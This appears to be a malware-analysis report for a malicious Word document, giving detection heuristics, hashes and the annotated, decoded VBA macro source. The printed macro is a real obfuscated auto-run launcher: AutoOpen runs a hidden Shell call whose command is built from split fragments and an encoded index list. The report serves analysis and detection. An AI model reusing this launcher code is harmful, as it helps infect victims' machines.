Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4693441b08197897…

MALICIOUS

Office (OLE)

103.2 KB · Created: 2018-08-09 10:14:00 · Authoring application: Microsoft Office Word · First seen: 2021-02-18
MD5: d0d49aae611680e760b9d0888cd58587 SHA-1: 92002e982933d7aa03170dc36162923797886e20 SHA-256: 4693441b08197897295187ba3ddef61a4a2dfd2191e76e9fb4a72d377b9b3e8a
112 Risk Score

Heuristics 6

  • ClamAV: Doc.Malware.Powload-6803987-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6803987-0
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11897 bytes
SHA-256: c640daf1e506c6425441b734511d612476c53aa855b5c456d52447d4abc9c52d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
111 of 173 identifiers look randomly generated (e.g. 'IQJwXTRPhGXIjz'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
' Module header of the decoded VBA source. VB_Base = "1Normal.ThisDocument"
' marks this as the document's ThisDocument module (the one Word binds to
' the open document), which is where the AutoOpen entry point below lives.
' The module name itself is one of the randomly generated identifiers
' counted by the obfuscation heuristic above.
Attribute VB_Name = "SNMMFrcLz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry point. Word executes a Sub named AutoOpen when the document is
' opened (finding OLE_VBA_AUTOOPEN above). Apart from the single Shell
' statement, every line in this procedure is filler.
Sub AutoOpen()
' Suppresses every runtime error, including those raised by the undeclared
' names used in the decoy expressions, so the filler never stops execution.
On Error Resume Next
   ' Decoys: TypeName evaluates its argument and the result is discarded.
   TypeName jcmNU
   TypeName CByte(792)
   TypeName 98
   TypeName 54
   TypeName Int(AwFmf + 44329)
   TypeName 956
' The only effective statement: starts a child process. Its command line is
' assembled at runtime from a Word KeyString lookup plus the return values
' of the string-builder functions in the other modules (hpbOtaDTutG,
' IQJwXTRPhGXIjz, vLzBCvfdzKVS and QAiEFKcDHu are not in the visible part
' of this preview). The second argument evaluates to 0, i.e. vbHide, so no
' window is shown. The "@" after Shell is likely a type-declaration suffix
' or a decoding artefact of the olevba extraction — confirm against the raw
' macro stream. Detection/mitigation note: the observable behaviour is the
' Word process spawning a child process from a just-opened document, which
' macro-blocking policies and child-process monitoring both cover.
Shell@ KeyString(vbKeyC) + hpbOtaDTutG + IQJwXTRPhGXIjz + jClDjAwt + IDnZjzbZlRA + wWNPQ + PMZEPolIY + XMldwk + awqiMtXqCpr + cskwIK + ijtPopSrF + vLzBCvfdzKVS + QAiEFKcDHu, 893070038 - 893070038
   ' More decoys after the payload call.
   TypeName Sin(9)
   TypeName 9706
   TypeName CInt(RlYiis)
End Sub


' Second module in the decoded source ("hFUNDTC"); it holds the string-builder
' functions referenced from AutoOpen's Shell argument.
Attribute VB_Name = "hFUNDTC"
' String builder #1 (used in AutoOpen's Shell argument). Returns the
' concatenation, in assignment order, of the six fragment variables set
' below. The fragments are short literal pieces that only read as a
' command-line prefix once joined — the split-literal pattern the
' "string-concatenation chain" heuristic refers to. Every "TypeName ..."
' line is a decoy whose value is discarded.
Function jClDjAwt()
' Errors from the undeclared names in the decoy arithmetic are ignored.
On Error Resume Next
TypeName Sgn(34568109)
   TypeName Oct(WvzhE)
   TypeName CSng(GADMq / PTnKVF)
' Chr(...) of four otherwise-unseen names plus 34: if those names are
' undefined (Empty) the argument reduces to 34, a double-quote character —
' confirm they are not assigned in a module outside this preview.
hcjKD = "md" + " " + "/V:" + "O/" + "C" + CStr(Chr(YTIvHEAO + irNXzvEmPKFis + 34 + cVaEijjdwSpv + XcQPNKEBUa)) + "s" + "e" + "t" + " - " + "  " + "=I"
TypeName Int(88630 - PNFWc)
   TypeName jYDfi
qBKhHPh = "dBS" + "Z" + "aVl" + "EV" + "EJw" + "pR" + "Gp" + "McX" + "USa" + "hl" + "Er"
TypeName 923
   TypeName Sqr(8)
   TypeName pmjcBZ
fZpof = "h" + "l" + "Bw" + "sz " + "7+" + "Wi" + ";mN" + "9" + "qC"
TypeName TAwmG
   TypeName 47
   TypeName Fix(wnwkP)
MwTPcZQ = ".@," + "\Pk" + "}t" + "Qb'" + "j26" + "=" + "oT)" + "fDy" + ":"
TypeName Cos(zCHfDT + sPvuR)
   TypeName CDbl(8)
   TypeName hkqWXA
wNpjUc = "/" + "nue" + "{F" + "4" + "Hv1" + "$(-"
TypeName 385
   TypeName qXbdN
   TypeName CByte(WooEZ)
EvQTXVCAbNs = "x" + "&" + "&f" + "o" + "r " + "%o" + " i" + "n " + "(" + "1" + "6,"
' Return value: all fragments joined; the sibling functions continue the text.
jClDjAwt = hcjKD + qBKhHPh + fZpof + MwTPcZQ + wNpjUc + EvQTXVCAbNs
   TypeName Sgn(22)
   TypeName Cos(11105 / Kiuuz + 34505 + YQDlwM)
   TypeName 85
End Function
' String builder #2 (part of the Shell argument in AutoOpen). Returns a
' comma-separated run of small integers (it starts "59,30,69,...") spliced
' from literal fragments; the split points fall inside numbers so the list
' never appears intact in the source. The decoy "TypeName" lines contribute
' nothing. wWNPQ, PMZEPolIY, XMldwk, awqiMtXqCpr and cskwIK continue the
' same list; it is presumably consumed by the loop text in ijtPopSrF, but
' that cannot be verified from this preview.
Function IDnZjzbZlRA()
On Error Resume Next
TypeName 94
   TypeName Hex(59353 / oqwpb + ODXqTX - cOmVb)
   TypeName Round(604)
PzFMCz = "59," + "30" + ",69" + "," + "26" + "," + "31," + "2" + "7,6"
TypeName Sqr(44066 - AjAFb)
   TypeName Atn(sTPiO)
   TypeName CStr(46398 / qWVWR)
vfvtaYo = "9" + ",28" + ",28" + ",33" + ",7" + "6," + "53," + "37" + ",5" + "9,"
TypeName 2121
   TypeName Int(bUzTjh)
oKCGnc = "5" + "8" + "," + "67," + "69" + "," + "30," + "78," + "59" + "," + "5" + "3," + "5"
TypeName jpMpWD
   TypeName cIMII
   TypeName Sin(OzzBmK)
nucuuL = "5,6" + "9," + "1" + "8," + "51," + "33,"
TypeName 392766598
   TypeName BDwMkj
   TypeName Atn(38471 + HSEZIR + 65698 - 47989)
AqwZASd = "40," + "69," + "51" + "," + "4" + "4,3" + "6" + ",6" + "9,5" + "3," + "4"
TypeName Int(ipJPvG)
   TypeName CLng(jaoqfT)
   TypeName CDbl(fpHWZV)
wMcGGLpzN = "3," + "28," + "3" + "7," + "69,"
TypeName 185071801
   TypeName 3
sobPaTkAi = "6" + "7," + "51," + "3" + "8" + ",7" + "6," + "26" + ",67" + ",9" + ",58" + ",54"
TypeName 4638
   TypeName CDate(YZNin / nzCJTj)
urNOJkc = ",27" + "," + "5" + "1" + "," + "51" + ",1" + "6,6" + "5," + "66," + "6"
TypeName Hex(aUbiDQ)
   TypeName 9132
KuKoViEL = "6" + ",5" + "3,2" + "2,3" + "2," + "2" + "2,7" + "8" + "," + "31" + ",27"
TypeName 6
   TypeName rGQto
   TypeName Int(LbjZZ)
PzJwl = "," + "22" + ",2" + "6," + "51," + "2" + "2" + "," + "31"
TypeName CSng(9827 + 97243)
   TypeName UHGQi
DzLpJLO = ",2" + "7" + ",4" + "4," + "26" + "," + "6" + "8," + "66" + ",2" + "7," + "49"
TypeName Fix(rIkUQn * UdMQcj)
   TypeName 36033102
cQhMOijFlw = ",4" + "2," + "19," + "42," + "6" + "0," + "75," + "4" + "5" + ",2" + "7," + "5" + "1"
' Return value: the twelve fragments joined in assignment order.
IDnZjzbZlRA = PzFMCz + vfvtaYo + oKCGnc + nucuuL + AqwZASd + wMcGGLpzN + sobPaTkAi + urNOJkc + KuKoViEL + PzJwl + DzLpJLO + cQhMOijFlw
   TypeName ThjpCw
   TypeName Atn(FlNvzi)
   TypeName Chr(6531)
End Function
' String builder #3. Same construction as IDnZjzbZlRA: ten literal
' fragments (the first starts with a comma, so it joins onto the previous
' function's output) concatenated into a comma-separated integer list and
' returned via the function name. Decoy "TypeName" lines are discarded.
Function wWNPQ()
On Error Resume Next
TypeName Fix(EHmAFw)
   TypeName Atn(566)
YsSVTiw = "," + "51," + "16" + ",6" + "5,6" + "6" + ",6" + "6," + "22" + ",67" + "," + "22,"
TypeName 291016583
   TypeName Log(hikYU + UoEpK)
GkdUzsVD = "16" + ",2" + "2" + "," + "1" + "6,5"
TypeName Sqr(iEGiO)
   TypeName EwRaJ
jGMOHcz = "9,2" + "8,3" + "7," + "74," + "4" + "4," + "26" + ",6" + "8," + "66" + ",21"
TypeName 53
   TypeName Log(2)
UuMSkzMsk = "," + "1" + "6," + "72" + "," + "67" + ",2" + "2," + "4"
TypeName Sin(jYKWA)
   TypeName Log(cXtLTd * dcmTwK + 85458 * GhpEiV)
   TypeName Tan(mJQaAu)
IrRTB = "5," + "2" + "7" + ",51" + ",51" + ",1" + "6,6" + "5" + ",66" + ","
TypeName 7590
   TypeName Sgn(162250344)
aLYwrmGGMBA = "66" + "," + "31," + "27" + ",59" + "," + "26,"
TypeName Sqr(cHivWl)
   TypeName 2
   TypeName EpLfco
mpRCNuJLwws = "69" + ",1" + "8" + ",26" + "," + "69," + "3" + "1," + "5" + "1,3"
TypeName rPtQKs
   TypeName 28
   TypeName Chr(206873904)
zobhCzH = "1," + "18" + "," + "27," + "59," + "59," + "2" + "8" + ",3"
TypeName CDate(28556 * puMBS)
   TypeName Round(rwMuCo)
awrFfjf = "1,4" + "4," + "18," + "59" + ",39" + ",6"
TypeName ChrB(cuafb * ariMz)
   TypeName CStr(rbtVC)
   TypeName ChrW(jftbsz * TbWYk - 85533 + 70931)
EbCzDc = "6," + "67" + ",67" + ",52" + "," + "49" + ",40" + "," + "45" + "," + "27," + "51"
' Return value: the ten fragments joined in assignment order.
wWNPQ = YsSVTiw + GkdUzsVD + jGMOHcz + UuMSkzMsk + IrRTB + aLYwrmGGMBA + mpRCNuJLwws + zobhCzH + awrFfjf + EbCzDc
   TypeName Tan(73)
   TypeName 592
   TypeName 1
End Function
' String builder #4. Nine literal fragments joined into the next slice of the
' comma-separated integer list started in IDnZjzbZlRA; returned via the
' function name. Every "TypeName" statement is filler with no effect.
Function PMZEPolIY()
On Error Resume Next
TypeName ChrW(USGZM)
   TypeName hBawR
ncTBbP = "," + "5" + "1," + "16," + "65" + ",6" + "6," + "66"
TypeName XCujm
   TypeName Chr(qkDQh * TwrHi * zIQwYk + zURfc)
PTwijQWlc = ",1" + "8,5" + "9" + ",39" + ",3"
TypeName CDbl(nuoBf)
   TypeName Rnd(bVVvaz / EiojI)
   TypeName 6
rzwLLJ = "7,1" + "8" + "," + "5" + "9," + "28" + ",69" + "," + "4" + "4,1"
TypeName WwRwB
   TypeName bAVFf
JLQjac = "8" + ",5" + "9,3" + "9,6" + "6," + "56"
TypeName CDbl(CZBhu)
   TypeName 115
   TypeName Cos(113256342)
oZjkzGFh = "," + "73," + "4,4" + "5,2" + "7" + ","
TypeName PiqtGW
   TypeName Rnd(qSCOZw)
mzoEwwfXqP = "51," + "51," + "1" + "6" + ","
TypeName uFshCf
   TypeName Chr(62639 * oKMbuo + 87467 + mqOiu)
   TypeName Oct(22)
XFHhw = "65," + "6" + "6,6" + "6,6" + "9"
TypeName CDbl(kDnAF)
   TypeName CInt(iiEfCM)
lEqzfH = ",28" + ",2" + "2," + "2" + "6,5" + "1,6"
TypeName CDbl(24269 * 45509 + KTPXOU / 20664)
   TypeName ChrB(5)
iEkKV = "9" + ",1" + "," + "6" + "9,2" + "8," + "22" + ",2" + "2," + "18" + "," + "18," + "37"
' Return value: the nine fragments joined in assignment order.
PMZEPolIY = ncTBbP + PTwijQWlc + rzwLLJ + JLQjac + oZjkzGFh + mzoEwwfXqP + XFHhw + lEqzfH + iEkKV
   TypeName AGIhq
   TypeName sijiis
End Function
' String builder #5. Six literal fragments joined into a further slice of the
' comma-separated integer list; returned via the function name. The
' "TypeName" statements are discarded decoys.
Function XMldwk()
On Error Resume Next
TypeName 7004
   TypeName Sgn(LZnFV)
aMrwXivh = ",59" + "," + "6" + "7" + ",44" + ",6"
TypeName Rnd(MpTpvU)
   TypeName Oct(379)
   TypeName CInt(hzWVV)
wESofhklAMw = "9," + "3" + "1" + ",6" + "6,5" + "7,7" + "3," + "64," + "2"
TypeName wfkWLf
   TypeName 53
VNfrdawHW = "8," + "5" + "4," + "4" + "4,2"
TypeName 113758053
   TypeName CByte(8)
riwJDm = "1" + ",16" + ",2" + "8," + "3" + "7"
TypeName Fix(18)
   TypeName dqiCuh
HSpQCaWh = ",5" + "1," + "77" + ",5" + "4," + "45," + "5" + "4,"
TypeName 536
   TypeName JGVilr
zOCUPp = "61," + "38," + "76," + "68" + ",42" + ",43" + ",3"
' Return value: the six fragments joined in assignment order.
XMldwk = aMrwXivh + wESofhklAMw + VNfrdawHW + riwJDm + HSpQCaWh + zOCUPp
   TypeName 2714
   TypeName CDbl(50665 * hStuZ + 1889 / 19042)
   TypeName Chr(22274 - ijDHoS)
End Function
' String builder #6. Six literal fragments joined into the next slice of the
' comma-separated integer list; returned via the function name. All
' "TypeName" lines are filler.
Function awqiMtXqCpr()
On Error Resume Next
TypeName ChrW(359698930)
   TypeName Hex(3355)
   TypeName CStr(9145)
MOvqbaAa = "3,5" + "8,3" + "3" + "," + "5" + "4,"
TypeName CBool(967)
   TypeName Oct(7586)
   TypeName Cos(dBhtP)
lLdjctOs = "75" + "," + "34," + "41" + "," + "54," + "3" + "8" + ","
TypeName YoHUjf
   TypeName Rnd(8)
ZGwtMXhpI = "76," + "68" + ",31" + ",5" + "1" + ",58" + ",7" + "6,6" + "9,6" + "7" + ",7" + "4,6"
TypeName 6550
   TypeName 724
BnZZNTZ = "5,5" + "1" + ",69" + ",39" + ",16" + ",3" + "5," + "54"
TypeName fEHsHj
   TypeName Tan(dDXcDk - 13969 - 72516 * YQYTQ)
   TypeName Sgn(47)
kHLNWMwt = ",47" + ",5" + "4," + "35," + "76," + "68," + "4" + "2,4"
TypeName hKQQqw
   TypeName Atn(3050 * HPMlD)
   TypeName uKhti
iooti = "3" + ",3" + "5,5" + "4" + "," + "44," + "6" + "9"
' Return value: the six fragments joined in assignment order.
awqiMtXqCpr = MOvqbaAa + lLdjctOs + ZGwtMXhpI + BnZZNTZ + kHLNWMwt + iooti
   TypeName LVJaa
   TypeName wIUwT
   TypeName 903
End Function
' String builder #7. Twelve literal fragments joined into the last purely
' numeric slice of the comma-separated integer list; returned via the
' function name. Decoy "TypeName" statements throughout.
Function cskwIK()
On Error Resume Next
TypeName 4579
   TypeName LMAkv
   TypeName 428125894
TBYUA = ",7" + "9" + ",6" + "9," + "5" + "4" + ",3" + "8" + ",6"
TypeName Chr(SiUKjv)
   TypeName 28
phzBUrP = "2," + "59," + "2" + "6,6" + "9,2" + "2," + "18"
TypeName CBool(jPnVI)
   TypeName CBool(85)
XzkjiFw = ",27" + ",77" + "," + "76" + ","
TypeName Fix(2165 - 27933 - ZTtzlW + UrLdfJ)
   TypeName HSsBb
   TypeName Hex(8)
bwVliJfss = "67," + "25," + "1" + "4," + "33," + "37," + "6" + "7," + "33" + ",7"
TypeName CDbl(2)
   TypeName Round(wYicVv)
   TypeName 586
rSEBOb = "6" + "," + "26" + "," + "67" + ",9," + "61," + "70"
TypeName CLng(66601 - BjzzF + 72932 / ocjCDY)
   TypeName Rnd(ahtafj / zSGhiR)
   TypeName 4
GYYEtSnWT = ",51" + ",26" + ",6" + "4," + "7" + "0" + "," + "76," + "5"
TypeName sBnzlz
   TypeName Oct(981)
RusLNXKLW = "3" + ",3" + "7," + "59" + ",44" + ",6" + "3" + ",5" + "9,"
TypeName CDate(idGhVv / mCziu - wswYsA - kDiaak)
   TypeName CBool(84)
   TypeName Sqr(ASHkp)
IHRbdq = "30" + ",67" + "," + "28" + "," + "59"
TypeName Sin(42149 / wNQza)
   TypeName Kfrzzv
wVXzhlqsVZ = "," + "2" + "2,1" + ",71" + "," + "37" + "," + "28"
TypeName CInt(aLHVir)
   TypeName CSng(2)
aYLpADNhK = ",69" + "," + "7" + "7," + "76" + ",6" + "7," + "2" + "5" + "," + "14" + "," + "4"
TypeName CBool(ujHkSH + hwVdw)
   TypeName CLng(63145 / NMJok)
vmALsd = "6" + "," + "3" + "3," + "76" + ",6" + "8,3" + "1," + "5" + "1," + "61" + ",38" + ",21"
TypeName Tan(7790)
   TypeName Fix(71390 + 94297 - RkAmG + OHvQv)
   TypeName Chr(YpjNCT)
SYUOjmTTAjT = "," + "5" + "1" + ",2" + "2,"
' Return value: the twelve fragments joined in assignment order.
cskwIK = TBYUA + phzBUrP + XzkjiFw + bwVliJfss + rSEBOb + GYYEtSnWT + RusLNXKLW + IHRbdq + wVXzhlqsVZ + aYLpADNhK + vmALsd + SYUOjmTTAjT
   TypeName AUffOF
   TypeName vKZBX
End Function
' String builder #8 (last one visible in this preview). The first fragments
' finish the integer list; the later ones (rqdznz onward) switch to text
' containing loop/control tokens, which is the visible basis for the
' "execution terms" note in the EXTRACTED_FILE_STATIC_TRIAGE finding. The
' result is returned via the function name; "TypeName" lines are decoys.
' The remaining Shell operands (vLzBCvfdzKVS, QAiEFKcDHu) are outside the
' preview, so the full assembled string cannot be confirmed from here.
Function ijtPopSrF()
On Error Resume Next
TypeName Round(zPoaPa)
   TypeName Log(1585)
mwqjdvwQhI = "26" + "," + "51," + "78" + "," + "48" + "," + "26" + ",59"
TypeName 471
   TypeName CInt(2017)
URuNJNnh = "," + "1" + "8," + "69," + "31," + "3" + "1," + "33," + "76," + "68" + "," + "31," + "5"
TypeName Round(1)
   TypeName RzjbJA
   TypeName sACZDz
vEnjZ = "1" + ",38" + ",53" + ",26" + ",6" + "9,2" + "2,4"
TypeName dMtaNP
   TypeName ChrB(34857 - RLWjp + KZKNv + 29292)
   TypeName Sgn(1)
Ddtnd = "9," + "38" + "," + "50," + "18," + "22," + "51," + "1" + "8," + "27," + "70" + ","
TypeName Int(jhiSv)
   TypeName Hex(PlAMa)
   TypeName CLng(2)
XNzXuYNVAz = "50," + "50" + ",3" + "3," + "33" + ",3" + "3,3" + "3," + "3" + "3," + "3"
TypeName WjcwE
   TypeName Oct(waGOz + 70785)
   TypeName 35
dDVtik = "3,3" + "3" + ",3" + "3," + "33," + "33," + "33," + "3" + "3" + ",3" + "3," + "33"
TypeName Sin(COOoYB)
   TypeName 744
   TypeName Hex(UDPww + ShiWwQ)
' From here the fragments close the list and carry control-flow text rather
' than numbers.
rqdznz = ",33" + "," + "33," + "3" + "3,8" + "8)" + "do" + " s" + "e"
TypeName BtEjTQ
   TypeName rWdtnw
alZPTTi = "t ]" + "   " + "=!]" + "  " + " !!" + "- " + " " + " :" + "~%o"
TypeName Sin(820)
   TypeName ChrB(5)
   TypeName 963
SibwAoaZXu = ",1" + "!&&" + "if " + "%o" + "=" + "=88" + " "
TypeName Fix(31076 * uKpQN)
   TypeName Tan(53951 + Cniai)
' Same Chr(... + 34 ...) construction as in jClDjAwt: with the surrounding
' names undefined it yields a double-quote — confirm they are not assigned
' elsewhere in the macro source.
fLWGuukQuXh = "ca" + "l" + "l" + " %]" + "  " + " :" + "~-3" + "60" + "%" + CStr(Chr(lzVCpazMfj + PKwOQFHA + 34 + rioTfziaB + LulIucPwj)) + " " + "   "
' Return value: the ten fragments joined in assignment order.
ijtPopSrF = mwqjdvwQhI + URuNJNnh + vEnjZ + Ddtnd + XNzXuYNVAz + dDVtik + rqdznz + alZPTTi + SibwAoaZXu + fLWGuukQuXh
   TypeName RGtEuF
   TypeName CLng(7)
End Function